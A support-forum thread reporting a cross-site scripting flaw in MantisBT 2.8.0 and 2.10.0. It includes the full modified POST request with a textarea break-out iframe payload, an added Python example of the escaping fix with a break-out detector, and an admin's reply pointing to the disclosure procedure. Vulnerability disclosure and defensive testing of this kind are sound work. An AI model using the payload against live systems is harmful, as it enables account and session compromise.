Cross-site scripting on Mantis Bug Tracker v2.10

tuanklnew
Posts: 5
Joined: 28 Nov 2017, 03:10

Post by tuanklnew »

Yesterday I accidentally found a security vulnerability, cross-site scripting, in Mantis Bug Tracker. In more detail, I used Burp Suite to modify a POST parameter sent to adm_config_report.php. The parameter named "value" is affected through its elements fixed_in_version, project_id and id. I inserted </textarea><iframe src=javascript:alert(1212) into "fixed_in_version":

Code:

POST /mantisbt/adm_config_report.php HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
Referer: http://192.168.70.11/mantisbt/adm_config_report.php
Cookie: MANTIS_secure_session=1; MANTIS_STRING_COOKIE=6xgdamq8V5fgA4vDchh450KI4bKW2kxYeNRdhYfw4cvWrMPmBa7KMqx2HDi7QbsW; PHPSESSID=ll27va6a7c2r3rv8m75phoraa7
Host: 192.168.70.11
Content-Length: 353
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US
Content-Type: application/x-www-form-urlencoded

user_id=0&project_id=0&config_option=csv_columns&type=3&value=["id","project_id","reporter_id","handler_id","priority","severity","reproducibility","version","category_id","date_submitted","os","os_build","platform","view_state","last_updated","summary","status","resolution","fixed_in_version</textarea><iframe src=javascript:alert(1212) "]&action=edit

And I got a 200 response from Mantis:

Code:

HTTP/1.1 200 OK
Last-Modified: Wed, 24 Jan 2018 11:10:36 GMT
Server: Apache/2.4.17 (Win32) OpenSSL/1.0.2d PHP/5.6.20
X-Frame-Options: DENY
X-Content-Type-Options: nosniff
Expires: Wed, 24 Jan 2018 11:10:36 GMT
x-ua-compatible: IE=edge,chrome=1
X-Powered-By: PHP/5.6.20
Date: Wed, 24 Jan 2018 11:10:36 GMT
Content-Type: text/html; charset=UTF-8
Content-Security-Policy: default-src 'self'; frame-ancestors 'none'; style-src 'self' 'unsafe-inline'; script-src 'self'; img-src 'self'
Cache-Control: no-store, no-cache, must-revalidate
Transfer-Encoding: chunked

The HTML response contained the inserted iframe:
[screenshot of the rendered response]
If you want to view the full HTML response, look at the output.txt file in the attachment. I tested on Mantis 2.8.0 and 2.10.0.
Attachment: output.txt (18.97 KiB)

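The bug the post describes is a textarea break-out: a stored configuration value is written into a `<textarea>` without HTML escaping, so a value containing `</textarea>` ends the text context and everything after it is parsed as markup. The following is an added example, not MantisBT's code: it renders a value the vulnerable way and the escaped way, and includes a small checker a tester can run over a captured response body to confirm whether a payload actually left the textarea. The template, the function names and the sample value are assumptions made for illustration; the payload is the post's, with a closing `>` added so the iframe tag is well-formed on its own. In the project's PHP the equivalent fix is to pass the value through an HTML-escaping helper such as `htmlspecialchars()` before output.

```python
"""Textarea break-out XSS: vulnerable vs. escaped rendering, plus a checker.

Added example, not MantisBT code. The template, function names and the
constructed sample value below are assumptions made for illustration.
"""
import html
from html.parser import HTMLParser

# Constructed sample input in the spirit of the forum post: a JSON array of
# column names whose last element contains the break-out payload.
PAYLOAD = ('["id","project_id",'
           '"fixed_in_version</textarea><iframe src=javascript:alert(1212)>"]')


def render_unescaped(value: str) -> str:
    """Vulnerable pattern: the stored config value is echoed verbatim."""
    return f'<form><textarea name="value">{value}</textarea></form>'


def render_escaped(value: str) -> str:
    """Hardened pattern: HTML-escape before output. '<' becomes '&lt;', so the
    browser never sees a closing </textarea> inside the value."""
    return (f'<form><textarea name="value">'
            f'{html.escape(value, quote=True)}</textarea></form>')


class _BreakoutScanner(HTMLParser):
    """Records start tags that appear outside any <textarea>."""

    def __init__(self) -> None:
        super().__init__()
        self.depth = 0      # current textarea nesting depth
        self.outside = []   # (tag, attrs) seen while depth == 0

    def handle_starttag(self, tag, attrs):
        if tag == "textarea":
            self.depth += 1
        elif self.depth == 0:
            self.outside.append((tag, dict(attrs)))

    def handle_endtag(self, tag):
        if tag == "textarea" and self.depth > 0:
            self.depth -= 1


def breakout_tags(document: str, suspicious=("iframe", "script", "img", "svg")):
    """Return suspicious tags that landed outside every textarea. A non-empty
    result is evidence the payload escaped the intended text context."""
    scanner = _BreakoutScanner()
    scanner.feed(document)
    scanner.close()
    return [(tag, attrs) for tag, attrs in scanner.outside if tag in suspicious]


def is_exploitable(document: str) -> bool:
    return bool(breakout_tags(document))


if __name__ == "__main__":
    for name, render in (("unescaped", render_unescaped),
                         ("escaped", render_escaped)):
        body = render(PAYLOAD)
        print(f"{name}: break-out tags = {breakout_tags(body)}")
```

The checker only answers whether the markup context is broken, which is what the post's screenshot shows; it says nothing about whether a given browser would run the script. Note that the captured response carries `script-src 'self'` with no `'unsafe-inline'`, and browsers that enforce CSP treat a `javascript:` URL in an iframe `src` as inline script and block it, so the `alert(1212)` would fire only in a browser that does not enforce CSP, such as the IE11 identified in the request's User-Agent. The underlying output-encoding defect is real either way, since the same sink accepts payloads that CSP does not cover.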
atrol
Site Admin
Posts: 8366
Joined: 26 Mar 2008, 21:37
Location: Germany

Re: Cross-site scripting on Mantis Bug Tracker v2.10

Post by atrol »

Please create a report following those instructions https://www.mantisbt.org/wiki/doku.php/ ... y_problems
Please use Search before posting and read the Manual